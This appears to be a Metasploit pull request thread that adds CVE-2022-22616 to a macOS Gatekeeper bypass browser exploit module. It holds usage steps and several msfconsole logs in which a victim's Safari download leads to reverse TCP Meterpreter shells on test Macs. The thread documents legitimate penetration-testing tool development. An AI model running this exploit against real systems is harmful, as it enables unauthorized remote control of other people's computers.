Add CVE-2022-22616 to gatekeeper bypass module

[space-r7]

Description

This adds support for CVE-2022-22616 to the existing Gatekeeper bypass exploit module which reportedly covers MacOS Big Sur all the way to MacOS Monterey versions below 12.3. Since this now targets two CVEs, I've introduced a new CVE option to select which CVE to exploit. This default is the most recent CVE.

Notes: Currently, the native OSX payload / target dies during exploitation. Not sure if that is related to the exploit itself or if there's an issue with the payload, so I'll try and look into that next week.

Verification

• Start msfconsole
• use exploit/osx/browser/osx_gatekeeper_bypass
• set CVE <cve_num>
• set LHOST <tab>
• set SRVHOST <tab>
• exploit
• Visit the URL on a vulnerable version of macOS

Scenarios

msf6 > use exploit/osx/browser/osx_gatekeeper_bypass
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   macOS x64 (Native Payload)
   1   Python payload
   2   Command payload


msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set target 1
target => 1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.140.1:4444 
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > [*] Using URL: http://192.168.140.1:8080/0sJEWz
[*] Server started.
[*] 192.168.140.133  osx_gatekeeper_bypass - Request /0sJEWz from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
[+] 192.168.140.133  osx_gatekeeper_bypass - macOS version 10.15.7 is vulnerable
[*] Sending stage (39936 bytes) to 192.168.140.133
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.133:49153 ) at 2022-04-01 17:47:58 -0500

msf6 exploit(osx/browser/osx_gatekeeper_bypass) > 
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: space
meterpreter > sysinfo
Computer     : spaces-Mac.local
OS           : Darwin 21.2.0 Darwin Kernel Version 21.2.0: Sun Nov 28 20:28:54 PST 2021; root:xnu-8019.61.5~1/RELEASE_X86_64
Architecture : x64
Meterpreter  : python/osx
meterpreter >

[timwr]

LGTM! I think this is OK to land as-is?
I tested on macOS 10.15.7 Catalina with Safari:

msf6 > use exploit/osx/browser/osx_gatekeeper_bypass
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set URIPATH /gatekeeper
URIPATH => /gatekeeper
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(osx/browser/osx_gatekeeper_bypass) >
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/gatekeeper
[*] Server started.

msf6 exploit(osx/browser/osx_gatekeeper_bypass) >
[*] 192.168.56.9     osx_gatekeeper_bypass - Request /gatekeeper from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
[+] 192.168.56.9     osx_gatekeeper_bypass - macOS version 10.15.7 is vulnerable
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (810576 bytes) to 192.168.56.9
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.9:49165 ) at 2022-04-03 07:28:59 +0100

msf6 exploit(osx/browser/osx_gatekeeper_bypass) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : Users-MacBook-Pro.local
OS           : macOS Catalina (macOS 10.15.7)
Architecture : x86
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx

I couldn't reproduce the issue where the native session dies?

[h00die]

I'm on 11.2.3 with the following output:

msf6 > use exploit/osx/browser/osx_gatekeeper_bypass
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set target 1
target => 1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8080/iFXRfTb532eIeR
[*] Server started.
[*] 2.2.2.2     osx_gatekeeper_bypass - Request /iFXRfTb532eIeR from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
[+] 2.2.2.2     osx_gatekeeper_bypass - macOS version 10.15.6 is vulnerable

At this point a file appeared in Downloads with a grey circle with a slash through it, and no further actions happened.

Also interesting its on 11.2.3 per "About this Mac", but its being detected as 10.15.6 (this is what the UA says it is...)

[space-r7]

I'm on 11.2.3 with the following output:

msf6 > use exploit/osx/browser/osx_gatekeeper_bypass
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set target 1
target => 1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8080/iFXRfTb532eIeR
[*] Server started.
[*] 2.2.2.2     osx_gatekeeper_bypass - Request /iFXRfTb532eIeR from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
[+] 2.2.2.2     osx_gatekeeper_bypass - macOS version 10.15.6 is vulnerable

At this point a file appeared in Downloads with a grey circle with a slash through it, and no further actions happened.

Also interesting its on 11.2.3 per "About this Mac", but its being detected as 10.15.6 (this is what the UA says it is...)

I'll try and see if I can test on a 11.2.* version and figure out what's going wrong. I'm also seeing 10.15.6 in the user agent on MacOS 12.1

[timwr]

I can't reproduce any failures for this unfortunately. I have two devices on 10.15.7 but presumably if I allow them to update, they will receive the patch for this issue.
@h00die do you have any app* files in the ~/Downloads/ folder that might be getting in the way?

[space-r7]

I can't reproduce any failures for this unfortunately. I have two devices on 10.15.7 but presumably if I allow them to update, they will receive the patch for this issue. @h00die do you have any app* files in the ~/Downloads/ folder that might be getting in the way?

I tested on 11.5.2, and the file does still have the com.apple.quarantine attribute once downloaded / extracted with Safari. It's odd since the Jamf blog mentions that the exploit was tested on Safari versions going back to 14.0.2, my version being 14.1.2. Patched in version 15.4. I'm not getting the issue that @h00die described though.

[h00die]

#RTFM I didn't realize clicking the file was required. This is working for me with the same payload as @timwr .

msf6 exploit(osx/browser/osx_gatekeeper_bypass) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8080/a
[*] Server started.
[*] 2.2.2.2     osx_gatekeeper_bypass - Request /a from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
[+] 2.2.2.2     osx_gatekeeper_bypass - macOS version 10.15.6 is vulnerable
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (810576 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:51264 ) at 2022-04-05 09:21:50 -040

meterpreter > sysinfo
Computer     : h00dies-MBP.home
OS           :  (macOS 11.2.3)
Architecture : x64
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx

[space-r7]

Just added a new commit that sets the local file header in the zip like in the Jamf blog post. It will also check the reported Safari version in the user agent if CVE-2022-22616 is being used. This time, I tested on both 11.5.2 and 12.1, and they both worked.

[timwr]

a43bfc9 is still working well for me. I'll go ahead and land this
Nice work @space-r7 !
Thanks for testing @h00die

[timwr]

Release notes

This change adds support for CVE-2022-22616 to the existing Gatekeeper bypass exploit module which reportedly covers macOS Catalina all the way to MacOS Monterey versions below 12.3. Since this now targets two CVEs, I've introduced a new CVE option to select which CVE to exploit. This default is the most recent CVE.

[space-r7]

Thanks for testing, @h00die! And thanks for testing / landing, @timwr!